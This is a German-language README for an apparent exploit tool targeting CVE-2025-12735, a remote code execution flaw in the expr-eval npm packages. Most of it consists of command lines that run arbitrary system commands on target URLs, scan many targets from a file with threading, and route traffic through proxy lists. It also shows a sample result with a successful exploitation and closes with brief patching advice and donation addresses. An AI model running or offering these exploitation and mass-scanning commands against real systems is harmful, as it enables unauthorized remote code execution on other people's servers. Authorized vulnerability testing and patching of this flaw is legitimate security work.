
Sicherheitsforschungstool zur Erkennung und zum Testen von CVE-2025-12735 (expr-eval RCE-Sicherheitslücke)
Ein Sicherheitsforschungswerkzeug zur Erkennung und Prüfung der CVE-2025-12735-Sicherheitslücke in den npm-Paketen expr-eval und expr-eval-fork.
Dieses Tool ist nur für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
CVE-2025-12735 ist eine kritische Sicherheitslücke zur Remote-Code-Ausführung (RCE) in den npm-Paketen expr-eval und expr-eval-fork. Diese Sicherheitslücke ermöglicht es Angreifern, beliebige Funktionen innerhalb des vom Parser verwendeten context-Objekts zu definieren, sodass bösartiger Code injiziert werden kann, der systemweite Befehle ausführt.
CVSS-Score: 9.8 (Kritisch) expr-eval-fork < 3.0.0 expr-eval-fork v3.0.0+
# Repository klonen
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce
# Abhängigkeiten installieren
pip install -r requirements.txt
# Skript ausführbar machen (optional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py
# Skript herunterladen
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py
# Abhängigkeiten installieren
pip install requests
# Einzelnes Ziel
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com
# Benutzerdefinierten Befehl ausführen
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"
# Mehrere Ziele aus Datei
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json
# Mit Threading für schnelleres Scannen
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5
# Ausführliche Ausgabe für Debugging
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v
# Einzelner Proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port
# Mehrere Proxys aus Datei
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt
-u, --url Ziel-URL
-f, --file Datei mit Ziel-URLs (eine pro Zeile)
-c, --command Auszuführender Befehl (Standard: id)
-t, --threads Anzahl der Threads (Standard: 1)
-o, --output Ausgabedatei (Standard: uknf_expr_eval_results.json)
-v, --verbose Ausführliche Protokollierung aktivieren
--proxy Proxy-URL (z.B. http://127.0.0.1:8080)
--proxy-list Datei mit Proxy-URLs (eine pro Zeile)
Das Skript generiert eine JSON-Datei mit detaillierten Ergebnissen:
{
"target": "http://target.com",
"timestamp": "2025-11-20T15:35:32.638109",
"expr_eval_detected": true,
"vulnerable": true,
"endpoint_found": true,
"exploitation_successful": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_endpoint": "/api/evaluate"
}
Wenn Sie expr-eval oder expr-eval-fork verwenden:
Sofort aktualisieren:
npm install expr-eval-fork@latest
Sicherheitspatch anwenden:
Eingabevalidierung implementieren:
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com
# Ziele-Datei erstellen
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Scan ausführen
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"
# Einzelner Proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080
# Mehrere Proxys aus Datei
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt
Beiträge sind willkommen! Bitte reichen Sie einen Pull Request ein.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Wenn Sie auf Probleme stoßen oder Vorschläge haben, öffnen Sie bitte ein Issue auf GitHub.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.
Wenn Sie dieses Tool nützlich finden, ziehen Sie bitte in Betracht, ihm auf GitHub einen Stern zu geben!
Dieses Tool wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen die entsprechende Autorisierung haben.
Wenn Sie dieses Tool nützlich finden und das Projekt unterstützen möchten:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
Vielen Dank für Ihre Unterstützung! 🙏